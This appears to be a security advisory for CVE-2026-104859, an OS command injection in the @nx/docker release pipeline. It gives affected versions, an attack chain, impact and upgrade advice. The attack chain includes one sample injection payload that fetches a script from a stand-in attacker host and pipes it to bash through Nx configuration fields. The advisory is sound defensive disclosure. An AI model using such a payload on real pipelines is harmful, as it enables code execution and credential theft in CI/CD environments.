OS Command Injection in @nx/docker Release Pipeline
The @nx/docker package is vulnerable to OS command injection via insecure shell command construction, allowing arbitrary command execution during release processes through malicious configuration inputs.
CVE search metadata
CVE search record: CVE-2026-104859. EPSS: 0.15%. KEV: no. Product: @nx/docker (>= 21.4.0, < 22.7.8; >= 23.0.0, < 23.1.1). Brief: OS Command Injection in @nx/docker Release Pipeline. Brief link: https://feed.craftedsignal.io/briefs/2026-10-nx-docker-injection/
The @nx/docker package contains an OS command injection vulnerability (CVE-2026-104859) within its release pipeline logic. During the execution of nx release version or nx release publish, the package constructs docker CLI commands by concatenating strings derived from the release.docker.repositoryName and registryUrl fields in the Nx configuration. Because these constructed strings are passed directly to /bin/sh -c, an attacker with control over the Nx configuration - such as a contributor to a repository or an actor who can submit a pull request - can inject arbitrary shell commands. These commands execute with the security context of the CI/CD job, which typically includes elevated privileges, access to registry credentials, and sensitive cloud tokens. The vulnerability is present in versions 21.4.0 through 22.7.7 and 23.0.0 through 23.1.0. Even --dry-run operations are insufficient for mitigation, as some injected commands execute prior to the dry-run validation logic.
Attack Chain
- An attacker gains access to modify the Nx configuration file within a project.
- The attacker updates the
release.docker.repositoryNameorregistryUrlconfiguration field to include shell command injection payloads (e.g.,; curl attacker.com/payload | bash). - The target CI/CD environment or a developer triggers the
nx release versioncommand as part of the release lifecycle. - The
@nx/dockerpackage reads the malicious configuration string. - The package constructs a shell command string using the attacker-supplied input.
- The package executes the constructed string using
/bin/sh -c. - The system interprets the injected shell syntax, executing the attacker's payload with the CI/CD agent's permissions.
- The attacker achieves code execution to exfiltrate credentials or compromise the build environment.
Impact
Successful exploitation allows for arbitrary code execution in CI/CD environments. Since release jobs often require privileged access to container registries and secret management stores, an attacker can leverage this access to exfiltrate credentials, inject malicious code into build artifacts, or gain unauthorized access to underlying infrastructure. There is no evidence of in-the-wild exploitation currently, but the high impact on secure supply chain integrity necessitates immediate remediation.
Recommendation
- Upgrade all instances of
@nx/dockerto versions 22.7.8 or 23.1.1 or later usingnx migrate 23.1.1or equivalent dependency manager updates. - Audit all existing Nx configuration files for anomalous
repositoryNameorregistryUrlvalues that contain shell metacharacters or unexpected command strings. - Delete any Docker version files generated by vulnerable versions of
@nx/dockerto ensure that previously interpolated malicious references are not read during subsequent publishing tasks. - Restrict CI/CD environment access to configuration-modifying operations to trusted personnel only, reducing the likelihood of malicious modifications to build metadata.
Immediate actions
Upgrade @nx/docker to version 22.7.8 or 23.1.1
Mitigations
Upgrade @nx/docker to 22.7.8 or 23.1.1
CVE-2026-104859